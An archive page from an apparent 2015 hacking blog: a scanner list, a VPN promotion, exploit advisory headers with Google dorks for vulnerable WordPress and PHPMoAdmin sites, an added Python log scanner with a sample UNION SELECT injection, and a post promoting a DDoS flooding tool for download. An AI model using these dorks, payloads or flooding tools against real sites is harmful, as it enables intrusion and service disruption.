Monday, March 23, 2015
Author: Unknown. Labels: scanner, tools, Web Hacking, Window
Web site security is very important because a website contains relevant information about a company, and nowadays website defacement is very common; even script kiddies and newborn hackers can do it. The most common vulnerabilities, like SQL injection and cross-site scripting, lead to defacement.
So if you want to secure your web application, find its vulnerabilities before a hacker finds them: use some relevant tools, find the vulnerabilities and fix them. There are many tools available for both the Windows and Linux platforms, both commercial and open source. Below are the best web vulnerability scanner tools that we have discussed before.
OWASP, the Open Web Application Security Project, is a worldwide non-profit organisation focused on improving the security of web applications; see its website for more about OWASP. The Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It has automatic scanning functionality and a set of tools that let you find vulnerabilities manually.
W3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework for finding and exploiting web application vulnerabilities that is easy to use and extend; w3af is working to become the best open source web application exploitation framework. It is available on Backtrack 5 too.
Skipfish is an automatic web application security tool designed to find vulnerabilities in a web application: find the vulnerabilities on your website before a hacker finds and exploits them. It is also available on Backtrack 5.
Nikto is one of the best open source web vulnerability scanners and is available on well-known Linux distributions like Backtrack, Gnacktrack, Backbox and others. You can use it on other distributions and on Windows too, because it only needs Perl.
Netsparker is a commercial tool designed to find vulnerabilities in web applications; a free version of Netsparker is also available, so you can download it and use it for a quick penetration test of a web application.
Websecurify is a cross-platform tool that runs on Windows, Linux and Mac. It is the best tool for finding the common web vulnerabilities that can cause great harm to a web application.
This is just a small list of the best tools; you can also use Wapiti, Grendel-Scan and other tools to perform the job. If you have any other tool in mind, share it with us via the comment box.
Wednesday, March 18, 2015
Author: Unknown. Labels: Anonymous surfing, tools, VPN, Web Hacking, Window
ShellfireVPN [One of the best VPN]
[*] German IP Address
[*] Normal surfing
[*] Encrypted Internet
[*] Safe surfing hotspot
[*] Bypass firewalls
Download: https://www.shellfire.de/
Thursday, March 5, 2015
Author: CoderX. Labels: exploit, Web Hacking, wordpress
wordpress theme photocrati 4.X.X SQL INJECTION
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [ powered by Photocrati ]
# Date: [ 23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email: dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [ 4.X.X ]
# Tested on: [ windows 7 ]

details
=======================================================
Software : photocrati
version  : 4.X.X
Risk     : High
remote   : yes
attacker can do a remote injection in site URL to get some sensitive information.
=======================================================
Author: CoderX. Labels: exploit, tools, Web Hacking
PHPMoAdmin Remote Code Execution
######################################################################
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
######################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework.
Author: CoderX. Labels: exploit, Web Hacking
WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=
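As an added defensive example (not part of the original post or of the advisory), the following Python scans access-log lines for requests to the plugin's spiderbigcalendar_month action whose cat_id is anything other than an integer, and separately for UNION/SELECT or information_schema keywords anywhere in the decoded query string. The log lines, IP addresses and the `inspect_request`/`scan_log` helper names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (not from the original post): a clean request
# to the plugin's AJAX action, the same action with a UNION injection in
# cat_id, and a keyword-only hit on an unrelated path.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&cat_id=1 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Feb/2015:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&date=2015-02&cat_id=1)%20UNION%20SELECT%201,2,3%20FROM%20information_schema.tables;--%20 HTTP/1.1" 200 9120
198.51.100.9 - - [12/Feb/2015:10:00:04 +0000] "GET /index.php?cat_id=1)%20UNION%20SELECT%201 HTTP/1.1" 404 120
"""

# Common Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# UNION ... SELECT with a short gap between them, or a probe of information_schema.
SQLI_RE = re.compile(r'\bunion\b.{0,40}\bselect\b|information_schema', re.I | re.S)

def inspect_request(target):
    """Return the reasons a request target looks like this injection; [] means clean."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    # The vulnerable action only needs an integer cat_id, so anything else in
    # that parameter is anomalous even before any keyword matching.
    if parts.path.endswith('/wp-admin/admin-ajax.php') and params.get('action') == ['spiderbigcalendar_month']:
        for value in params.get('cat_id', []):
            if not value.isdigit():
                reasons.append('non-numeric cat_id for spiderbigcalendar_month: %r' % value)
    # Decode the whole query once so %20-encoded keywords become visible.
    if SQLI_RE.search(unquote_plus(parts.query)):
        reasons.append('SQL keywords in query string')
    return reasons

def scan_log(text):
    """Return (ip, target, reasons) for every log line that trips a check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        reasons = inspect_request(m.group('target'))
        if reasons:
            hits.append((m.group('ip'), m.group('target'), reasons))
    return hits

if __name__ == '__main__':
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target[:60], reasons)
```

The clean line deliberately carries the plugin's own `select=month,list,week,day` parameter to show that the word "select" on its own does not trigger the keyword rule.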
Tuesday, March 3, 2015
Author: Unknown. Labels: DDOS, tools, Web Hacking, Window
RA1N DoSer v4 (lite)
Flooding
- UDP
- TCP
- SYN
- Port Scanning (100+ times faster than RDv3)
- History
- Favorites
- Awesome CPanel
- Defaults for input fields for flooding
- and more!
- Over 25kbs a UDP Flood
- Customizable SYN Flooding (using exploitations)
- Encrypted source (noobs piss me off)
- TCP Flooding (very efficient)
- program averages only 5,000 kbs of processing
[x] Download -> http://dl.dropbox.com
[x] Download -> http://mediafire.com
[x] Virusscan -> https://www.virustotal.com/
credit : RA1N